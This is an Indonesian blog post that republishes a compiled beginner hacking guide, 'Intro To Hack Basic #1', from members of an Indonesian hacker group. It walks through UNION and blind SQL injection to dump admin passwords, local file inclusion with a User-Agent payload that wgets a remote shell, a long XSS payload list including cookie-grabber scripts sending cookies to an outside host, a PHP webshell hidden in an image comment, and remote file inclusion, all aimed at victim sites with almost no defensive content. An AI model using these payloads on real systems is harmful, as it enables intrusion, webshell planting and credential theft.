Rabu, 19 Desember 2018

Pengenalan Dasar Hacking by kaMtiEz


Pengenalan Dasar Hacking by kaMtiEz





1.  Pengertian sql injection
[+] Author  : Gonzhack
[+] Homepage  : http://www.indonesiancoder.com
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan
juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya
menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -comments: /* atau --information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql
versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk
melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--[site]/berita.php?id=-100+order+by+2--[site]/berita.php?id=-100+order+by+3--[site]/berita.php?id=-100+order+by+4--sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
[ Indonesia ] Intro To Hack Basic #1   Page 3
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg
diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4
ini kita harus menebak sendiri table n column yg ada pada web tersebut karena
tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti
ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka
terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>>
dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_sche
ma.tables+where+table_schema=database()--
[ Indonesia ] Intro To Hack Basic #1   Page 4
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>>
dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_sch
ema.columns+where+table_name=0xhexa--pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal
yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
www.ascii-convert.co.cc
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_sch
ema.columns+where+table_name=0x61646D696E--============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan
pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi
column),6,7,8+from+(nama table berasal)--contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admi
n--==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda...
[ Indonesia ] Intro To Hack Basic #1   Page 5
2.  Local FIle Inclusion Step by Step
Author  : Don Tukulesto (root@indonesiancoder.com)
Homepage  : http://indonesiancoder.com
[o] INDEX [o]
I.  Penjelasan
II.  Konsep
III.  Bukti Konsep
IV.  Perbaikan
V.  Shout
I.  Penjelasan
_________________________
Local File Inclusion (juga dikenal sebagai LFI) adalah proses termasuk file
di server melalui web browser. Kerentanan ini terjadi karena suatu script
include dalam file tersebut salah penggunaannya dan memungkinkan direktori
traversal karakter dapat dilansanakan.
II.  Konsep
_________________________
Konsep serangan ini adalah perintah aplikasi untuk mengakses file komputer
yang tidak dimaksudkan untuk diakses. Serangan ini memanfaatkan kurangnya
keamanan (perangkat lunak ini bertindak persis seperti yang seharusnya)
sebagai lawan mengeksploitasi bug dalam kode.
Sebuah contoh kerentanan dalam file PHP
[php]<?php
$template = 'red.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE'];
include ( "/home/xtux/include/templates/" . $template );
?>
[/php]
Sebuah serangan terhadap sistem ini bisa untuk mengirim permintaan HTTP
berikut:
[code]GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd[/code]
Menghasilkan respon server seperti: 
[ Indonesia ] Intro To Hack Basic #1   Page 6
[quote]root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin[/quote]
III.  Bukti Konsep
_________________________
Sebagai contoh disini menggunakan kerentanan pada komponen Joomla! ckforms
[quote]index.php?option=com_ckforms&controller=[/quote]
http://namasitus.domain/index.php?option=com_ckforms &controller=
Sekarang mari kita periksa /etc/passwd untuk memastikan bahwa ini adalah
kerentanan Local File Inclusion.
[quote]http://namasitus.domain/index.php?option=com_ckforms &controller=
../../../../../../../../../../../../../../../etc/passwd[/quote]
berhasil disertakan
[quote]root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin[/quote]
Cek apakah proc/self/environ dapat diakses ?
[quote]http://namasitus.domain/index.php?option=com_ckforms &controller=
../../../../../../../../../../../../../../../proc/self/environ[/quote]
Jika mendapatkan sesuatu seperti
[quote]DOCUMENT_ROOT=/home/xtux/public_html/ GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive HTTP_HOST=www.namasitus.domain HTTP_KEEP_ALIVE=115
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 PATH=/bin:/usr/bin
QUERY_STRING=option=com_ckforms&controller=../../../../../../../../../../../.
./../../../proc/self/environ REDIRECT_STATUS=200[/quote]
[ Indonesia ] Intro To Hack Basic #1   Page 7
artinya proc/self/environ dapat diakses. Jika mendapatkan halaman tersebut
kosong, itu dapat diartikan error dalam proc/self/environ atau tidak dapat
diakses bahkan mungkin OS servernya adalah FreeBSD.
Langkah selanjutnya adalah penyuntikan kode berbahaya. Kita dapat
menyuntikkan kode kita di User-Agent HTTP Header. Gunakan Tamper Data Addon
untuk Firefox untuk mengubah User-Agent. Jika belum ada dapat di unduh Addon
Tamper Data di [url=https://addons.mozilla.org/enUS/firefox/addon/966/Tamper%20Data]https://addons.mozilla.org/enUS/firefox/addon/966/Tamper Data[/url]
Mulai Tamper Data di Firefox dan buka URL
[quote]http://namasitus.domain/index.php?option=com_ckforms &controller=
../../../../../../../../../../../../../../../etc/passwd[/quote]
Pilih Tamper dan pada kolom User-Agent isikan dengan kode berikut
[quote]<?system('wget http://hostingan.domain/shell.txt -O
shell.php');?>[/quote]
atau
[quote]<?exec('wget http://hostingan.domain/shell.txt -O
shell.php');?>[/quote]
kemudian tekan tombol submit. Hentikan Tamper Data, setelah itu kita periksa
apakah kode berbahaya tersebut telah berhasil disuntikkan.
http://namasitus.domain/shell.php
IV.  Perbaikan
_________________________
Update program CMS yang digunakan
V.  Shout
_________________________
IN THE NAME OF ALLAH and MUHAMMAD SAW.
Thx SirGod for tutorial bout Shell via LFI - proc/self/environ method
m4h0666, M364TR0N, MISTER SAINT, GONZHACK, CYB3R_TR0N,
kaMtiEz, ran, Ibl13z, N4ck0, chercut, M3NW5, Xr0b0t, yurakha,
arianom, Contrex, Mboys, senot, quick_silver, and you !
INDONESIAN CODER TEAM - Get the Codes and Feel the Soul
[ Indonesia ] Intro To Hack Basic #1   Page 8
3.  Tutorial dan Pengertian XSS ( Cross Site Scripting )
[+] Author : kaMtiEz
[+] Email : null :D
[+] WeB : www.magelangcyber.web.id - www.indonesiancoder.com -www.exploit-id.com
[~] XSS adalah sebuah mol situs web dinamis dan merupakan bagian dari kode
keluarga injeksi.
[~] XSS tidak apa-apa kecuali modifikasi parameter melalui HTTP GET dan HTTP
POST
variabile pelaksanaan kode Javascript pada tingkat URL, tepat ditempatkan
dalam variabel atau lebih.
[~] Dalam menemukan apakah suatu 'XSS bukanlah tugas yang sulit, dan untuk
mengeksploitasi hanya kode sederhana javascript... javascript ...
[~] dimana kita memasukan code2 javascript dan menjadi
http://127.0.0.1/path/search.php?uid=">< script> Alert ( 'Test XSS') <
/script>
[~] contoh paling sederhana / classic adalah
">< script>Alert( 'Test XSS')</script>
[~] jika suatu website terkena serangan XSS makan muncul cookie alert
[~] sekarang sudah banyak script2 untuk XSS seperti :
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.3v1L.org/cookiegrabber.php"></script>
<script>location.href="http://www.3v1L.org/cookiegrabber.php?cookie="+escape(
document.co
okie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav  ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>
"><script>alert(0)</script>
"><script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
[ Indonesia ] Intro To Hack Basic #1   Page 9
<font style='color:expression(alert(document·cookie))'>
'); alert('XSS
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color:62ca=red' onmouseover="alert('xss')"]mouse over
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("gotcha !");
<div
style="x:expression((window.r==1)?'':eval('r=1;ale
rt(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')"
)}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "><"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document·cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
[~] XXS tuh termasuk injection.. cara kerjanya sama persis dengan SQL
Injection...
cuma disini yang membedakan kalo XXS itu lebih kearah manipulasi data
apache/session
[~} kalo dibilang bisakah kita gunakan XXS untuk deface??
jawabnya bisa...
[ Indonesia ] Intro To Hack Basic #1   Page 10
[~] sekalian menjawab XXS Phising..
[+] POC :
"><script TYPE="text/javascript">document.write("<script
type="text/javascript"
src="http://www.situs.com/hacked.js"></"+"script>");<h1>XSS By
kaMtiEz</h1>;</script>
oke sekian aja ..
Semoga Bermanfaat :D
./kaMtiEz
[ Thx TO ]
[+] INDONESIAN CODER TEAM - MAGELANG CYBER TEAM - EXPLOIT-ID - MALANG CYBER
CREW - ARUMBIA TEAM
[+]
tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,RyanAby,Albertwired
[+]
Contrex,YadoY666,MarahMeraH,k4mpret0,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1
ck
[+] el_farahatz,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,Jos_ali_joe
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] every day is Holiday :D
[+] MAGELANGCYBER TEAM - Keluarga Besar Saya :))
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] MAGELANGCYBER Never Die :D
[+] nothing secure ..
[ Indonesia ] Intro To Hack Basic #1   Page 11
4.  Image Code Injection with LFI Tutorial
[+] Author : Alecs
[+] Email : null :D
[+] WeB : hacker-newbie.org - blitarhackerlink.info
Header Image
Banyak orang tidak tahu bahwa dalam foto-foto dan gambar di samping grafis, ada juga bidang
informasi pada header ini. Header ini hadir di semua gambar yang akan dibuat dalam hal
fotografi, atau dalam kasus program normal seperti Photoshop atau GIMP. Umumnya, mereka
berisi informasi seperti tanggal penciptaan, nama, ukuran, ukuran dan komentar.
Untuk memberikan ide saya akan menunjukkan gambar header saya:
File name : C:\Users\Alecs\Images\avatar.jpg
File size : 8631 bytes
File date : 2010:12:21 17:18:19
Resolution : 100 x 100
Comment : Avatar Forum
Seperti yang anda lihat kolom “Komentar” Aku sudah dimasukkan dalam contoh pertama,
Avatar Forum, ini menunjukkan bahwa kita bisa mengubahnya sesuka hati, dan karena itu kita
bisa menggunakan teknik ini dengan menyisipkan script.
Edited Comment with Jhead
Sekarang mari kita lihat cara mengedit komentar pada gambar, pertama mendapatkan diri
program “jhead“; sekali download, lalu menuju ke direktori root dari hard, misal disk C: /.
Buka Start -> Run -> cmd pada command prompt, Anda harus terlebih dahulu memilih direktori
untuk dimana dia berada
jhead lalu ketik “cd C :/”… baik sekarang untuk melihat header dari sebuah gambar perintahnya
adalah:
1  jhead namaimage.jpg
Ketika kita mengirim perintah tersebut, maka akan muncul keterangan seperti ditulis seperti yang
ditunjukkan dalam kotak keterangan di atas.
Sekarang untuk mengubah komentar, perintahnya adalah:
1  jhead -ce namaimage.jpg
[ Indonesia ] Intro To Hack Basic #1   Page 12
Lalu akan membuka Notepad, sekarang kita dapat menyisipkan kode tersebut, misalnya, grabber
cookie, sebuah shell, dll. Setelah menulis, langsung saja di save dan ayo let’s play with
exploitation.
Cara menggunakan teknik ini
Jangan meremehkan teknik ini karena, saya akan menunjukkan kini hadir sebuah gambar kode
dengan situs host dapat menjadi sarana dimana Anda dapat menyerang dia. >:) Sekarang saya
akan menunjukkan cara untuk memasukkan shell, misi webshell dasar php, anda dapat
menyerang sebuah situs yang mempunyai LFI vulnerability.
01  <?php
02  if($_GET["fvck"]=="distr"){
03    unlink($_GET["file"]);
04  }elseif($_GET["fvck"]=="list"){
05    $myDirectory = opendir($_GET["dir"]);
06    while($entryName = readdir($myDirectory)) {
07    $dirArray[] = $entryName;
08    }
09    closedir($myDirectory);
10    $indexCount   = count($dirArray);
11    Print ("$indexCount files<br>\n")
12    sort($dirArray);
13    for($index=0; $index < $indexCount; $index++) {
14    echo $dirArray[$index] . "<br>";
15    }
16  }elseif($_GET["fvck"]=="vedi"){
17    echo htmlspecialchars(file_get_contents($_GET["file"]));
18  }elseif($_GET["fvck"]=="inc"){
19    include($_GET["file"]);
[ Indonesia ] Intro To Hack Basic #1   Page 13
20  }
21  ?>
Setelah tersimpan kita harus menemukan sebuah situs dari LFI kereta seperti:
http://www.situskorban.com/index.php?file=home.php
Sekarang kita perlu meng-upload formulir di situs korban (misalnya memuat modul di avatar
forum), saya akan memasukkannya dengan menerapkan shell dengan perintah:
http://www.situskorban.com/index.php?file=img/avatar/avatartutorial.jpg&fvck=
list&dir=
Nah, jika shell pada situs ini bekerja dan saya akan menampilkan file yang berada di ruang web
korban, sekarang kita bisa menggunakan kesempatan ini untuk membaca file config.php jika ada
pada situs untuk menemukan informasi tentang database password dll.
Ok, sekian dulu.. Semoga Berguna
[ Indonesia ] Intro To Hack Basic #1   Page 14
5.  Tutorial Blind SQL Injection Referensi Indonesia
+]Author   : jos_ali_joe
[+]Contact   : josalijoe[at]ymail[dot]com
[+]Home    : http://alicoder.wordpress.com/ &
http://indonesiancoder.com/
Pendahuluan
Maaf sebelum nya disini saya hanya memberikan apa yang memang saya pelajari
tentang Blind SQL Injectiuon
kalau mungkin dalam penjelasan ini kurang di mengeti mohon di maklumi hanya
tutor cupu dari saya
dan buat yang sudah master tentang Blind SQL kalau dari penjelasan saya ada
kesalahan mohon di luruskan
[~] Apa Itu Blind SQL Injection
Mari di sini kita membahas Blind SQL tanpa metode SQL Injection
Mungkin sudah banyak yang tahu tentang metode SQL Inject. Oke Lanjut :D
Blind SQL Ini adalah metode hacking yang memungkinkan seorang Attacker yang
tidak sah untuk mengakses server database.
Hal ini difasilitasi oleh sebuah kesalahan pengkodean umum: program menerima
data dari klien dan mengeksekusi query SQL tanpa terlebih dahulu memvalidasi
masukan klien.
Attacker kemudian bebas untuk mengekstrak, memodifikasi, menambah, atau
menghapus konten dari database
Attacker bahkan bisa menembus server database dan ke dalam operasi dasar
system web yang di eksekusi.
Attacker biasanya akan mengetes kerentanan SQL injection dengan mengirimkan
masukan aplikasi yang akan menyebabkan server untuk menghasilkan sebuah query
SQL yang tidak valid.
Jika server kemudian kembali mengirimkan pesan karena kesalahan ke klien, Si
Attacker akan mencoba untuk reverse-engineer bagian dari query SQL yang asli
menggunakan informasi yang diperoleh dari pesan kesalahan tersebut.
Ciri khas dari administratif safeguard hanya untuk melarang menampilkan pesan
kesalahan database server.
Sayangnya itu tidak cukup.Jika aplikasi anda tidak ada pesan error, mungkin
masih rentan terhadap serangan SQL
Maaf bahasa nya terlalu kurang di mengerti.
[~] Mendeteksi Blind SQL Injection
Aplikasi Web biasanya menggunakan query SQL dengan masukan klien yang
disertakan dalam klausa WHEREUntuk mengambil data dari database.
Dengan menambahkan kondisi tambahan untuk pernyataan SQL dan mengevaluasi
output aplikasi web, Anda dapat menentukan apakah atau tidak aplikasi yang
rentan terhadap SQL injection.
[~] Blind SQL Injection
Oke mari lanjut ke contoh Eksekusi Blind SQL Injection setelah di atas sudah
menjelaskan tentang apa itu Blind SQL Injection dan Mendeteksi nya.
[ Indonesia ] Intro To Hack Basic #1   Page 15
Yupz Lanjut Kang Disini saya menggunakan Contoh Eksekusi dengan dork [
inurl:news.php?id= ]
Contoh : http://www.site.com/news.php?id=2
Yuk Bareng Kita Inject :
http://www.site.com/news.php?id=2 dan 1 = 1 <--- ini selalu benar dan load
halaman dari web itu sendiri masih normal
http://www.site.com/news.php?id=2 dan 1 = 2 <--- ini salah, jika masih ada
beberapa teks, gambar atau beberapa konten yang hilang pada halaman kdari web
kembali maka web tersebut rentan terhadap serangan Blind SQL Injection
[~] Mendapatkan Versi My SQL
Untuk mendapatkan versi MySQL dalam serangan blind harus menggunakan
substring:
http://www.site.com/news.php?id=2 and substring(@@version,1,1)=4
Hal ini harus mengembalikan TRUE jika versi MySQL 4. Ganti 4 dengan 5, dan
jika kembali query TRUE maka versi adalah 5.
[~] Memeriksa SubSelect
Ketika Kita menginject dan tidak bekerja maka kita gunakan subselect.
http://www.site.com/news.php?id=2 and (select 1)=1
Jika halaman web tersebut berubah normal kemudian subselect bekerja, maka
kita akan melihat apakah kita memiliki akses ke mysql.user:
http://www.site.com/news.php?id=2 and (select 1 from mysql.user limit 0,1)=1
Jika load halaman web biasanya kita memiliki akses ke mysql.user dan kemudian
kita bisa menarik beberapa load_file password menggunakan () fungsi dan
outfile.
[~] Memeriksa Tabel dan Nama Kolom
Ini tingkat susah enak nya Blind SQL itu sendiri di sini keberuntungan dan
menebak-nebak bekerja lebih dari apa pun.
http://www.site.com/news.php?id=2 and (select 1 from users limit 0,1)=1
(Dengan limit 0,1 query kita disini mengembalikan 1 baris data, menyebabkan
kembali subselect hanya 1 baris, ini sangat penting)
Jika Anda mendapatkan FALSE (beberapa artikel yang hilang), hanya mengubah
nama tabel sampai anda menebak yang benar.
Nah seumpama di sini kita sudah mendapatkan nama tabel pengguna, sekarang apa
yang kita butuhkan adalah kolom nama.
Sama dengan nama tabel, kita mulai menebak. Seperti saya bilang sebelumnya
coba nama umum untuk kolom:
http://www.site.com/news.php?id=2 and (select
substring(concat(1,password),1,1) from users limit 0,1)=1
Jika halaman web yang kita inject biasanya kita tahu bahwa nama kolom adalah
password (jika kita mendapatkan
yang false kemudian coba nama umum atau hanya menebak).
Di sini kita menggabungkan 1 dengan password kolom, kemudian substring
kembali karakter pertama (1,1)
[~] Mendapatkan Full Data Dari Web Yang Kita Inject
Kita telah menemukan tabel kolom username i password sehingga kami akan
tarik karakter tersebut.
http://www.site.com/news.php?id=2 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>80
Ok di sini mari kita menarik karakter pertama dari pengguna pertama di tabel
pengguna.
Substring di sini mengembalikan karakter pertama dan 1 karakter panjangnya.
ascii () mengkonversi bahwa 1 karakter ke nilai ascii dan kemudian
membandingkannya dengan simbol yang lebih besar kemudian>.
[ Indonesia ] Intro To Hack Basic #1   Page 16
Jadi jika ascii char lebih besar dari 80, beban halaman normal. (TRUE) kita
terus mencoba sampai kita mendapatkan false.
http://www.site.com/news.php?id=2 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>95
Disini saya mendapatka True mari kita naikan true nya
http://www.site.com/news.php?id=2 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>98
Belum dapat juga true nya mari kita tambahkan lagi
http://www.site.com/news.php?id=2 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>99
Yupz Ternyata False ada di 99 .. :P
Jadi karakter pertama di username adalah char (99). karena (99) adalah huruf
'c' . Coba convert aja di ascii :P
Jadi teruslah Tambahkan sampai kita mendapatkan nya . (Ketika> 0 returns
false kita tahu bahwa kita telah mencapai akhir)
[~] Beberapa Pertanyaan
Tanya : Untuk mengetahui char nya dari mana ??
Jawab : http://ascii-table.com/
Tanya : blind sql injection cisa buat inject smua site??
Jawab : bisa buat injek semua site yang memiliki bug sql. klo mau sih yg v5
pun bisa pakai blind injek. tp v5 kan ada table information_schema. jd di
manfaatin.
Tanya : Trus buat ngecek bug cuma make ',and 1=1,and 1=0?? ad yg laen??
Jawab : bisa juga pakai tanda minus di belakangnya ( ?id=1- )
Tanya : maksudnya true am false apa? kalau true halaman web tetep? klo false
halaman web burbah ?
Jawab : true = return benar sesuai kondisi yg di tentukan.
false = return salah berdasar kondisi yg di tentukan.
misal : and 1=1
=> true jika berita muncul. karena 1=1 adalah benar, jd
muncul.
=> false jika berita tidak muncul
and 1=2
=> true jika berita tidak muncul. karena 1=2 adalah salah, jd
gak muncul.
=> false jika berita ternyata muncul
Tanya : blind sql injection bisa nginjek .htm? ato cuma yg php ujungnya?
Tanya : .htm, .php, .asp, dll. itu tergantung config server. ada server yang
di config kalau file berextensi .htm adalah php itu bisa saja.
tapi normalnya, adalah .php. karena php yg mengelola data di
server. tetepi sprt yg gw katakan barusan, gak semua yg .php, tp .htm pun
bisa berisi php, sesuai config.
[~] Penutup
Terima kasih sudah membaca tutor cupu dari saya . mohon untuk jangan Tertawa
jika ada yang salah .
Referensi : Google - Packetstorm Security - Wikipedia - Hacker Newbie
Grettz : ./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker
- Tecon Crew - Palembang Hacker Link - Codenesia
./Byroe Net - Yogya Carderlink - Wannabe Hacker - anten4 -Hacker Newbie - Packetstorm Security - All Forum Underground Indonesia
My Team : ./Indonesian Coder
Special Thanks :./ Allah S.w.t & Muhammad S.a.w
./ Terima kasih buat guru Blind Sql : ./ArRay - game over -gt_portnoy
[ Indonesia ] Intro To Hack Basic #1   Page 17
6.  RFI Tutorial By kaMtiEz
Original Post By kaMtiEz
[+] sedikit tutorial bagaimana mendeteksi sebuah RFI vulnerabilty di dalam
suatu CMS /php scripts
[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita bisa
melakukan require melalui injector //
[+] ok permisalan
1.  misal file : function.php
2. di dalam source code function.php berisi scripts seperti
Code:
if(!$root['Path']){$root['Path'] = "./";}
include($root['Path']."config/config.php");
3. apabila dalam function.php gagal meng query / error di line XxX
kita dapat memasukkan injektor ..
4. dan code nya adalah :
Code:
http://127.0.0.1/path/function.php?root[Path]=
5. lalu tambahkan suatu injektor ..
dan menjadi ..
Code:
http://127.0.0.1/path/function.php?root[Path]=http://127.0.0.1/injektor.txt
6.  see what ? u got vuln with RFI …

PL45T1K

Author & Editor

0 komentar:

Posting Komentar